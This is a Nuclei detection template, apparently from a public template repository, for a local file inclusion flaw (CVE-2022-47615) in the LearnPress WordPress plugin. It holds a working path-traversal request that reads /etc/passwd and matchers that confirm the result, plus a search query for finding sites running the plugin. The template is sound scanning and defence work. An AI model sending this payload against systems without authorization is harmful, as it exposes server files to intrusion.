nuclei-templates/http/cves/2022/CVE-2022-47615.yaml

60 lines
1.8 KiB
YAML
Raw Blame History

This file contains ambiguous Unicode characters!

This file contains ambiguous Unicode characters that may be confused with others in your current locale. If your use case is intentional and legitimate, you can safely ignore this warning. Use the Escape button to highlight these characters.

id: CVE-2022-47615
info:
name: LearnPress Plugin < 4.2.0 - Local File Inclusion
author: DhiyaneshDK
severity: critical
description: |
Local File Inclusion vulnerability in LearnPress WordPress LMS Plugin <= 4.1.7.3.2 versions.
remediation: |
Upgrade to the latest version of LearnPress Plugin (4.2.0 or higher) to mitigate this vulnerability.
reference:
- https://github.com/RandomRobbieBF/CVE-2022-47615/tree/main
- https://nvd.nist.gov/vuln/detail/CVE-2022-47615
- https://patchstack.com/database/vulnerability/learnpress/wordpress-learnpress-plugin-4-1-7-3-2-local-file-inclusion?_s_id=cve
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-47615
cwe-id: CWE-434
epss-score: 0.00737
epss-percentile: 0.78695
cpe: cpe:2.3:a:thimpress:learnpress:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 1
vendor: thimpress
product: learnpress
framework: wordpress
publicwww-query: "/wp-content/plugins/learnpress"
tags: cve,cve2022,wp-plugin,wp,wordpress,learnpress,lfi
http:
- raw:
- |
GET /wp-json/lp/v1/courses/archive-course?template_path=..%2F..%2F..%2Fetc%2Fpasswd&return_type=html HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"
- type: word
part: body
words:
- '"status":'
- '"pagination":'
condition: and
- type: word
part: header
words:
- "application/json"
- type: status
status:
- 200
# digest: 4a0a0047304502204899ab4483153e6cae2e0b61e4f0d87ee2d56da8b9c395607205a4dd5a5ee1a7022100abd9b6fdee40674f50e35b96944bd504aa58901f8bf8484f54f5fa4267b3c8ed:922c64590222798bb761d5b6d8e72950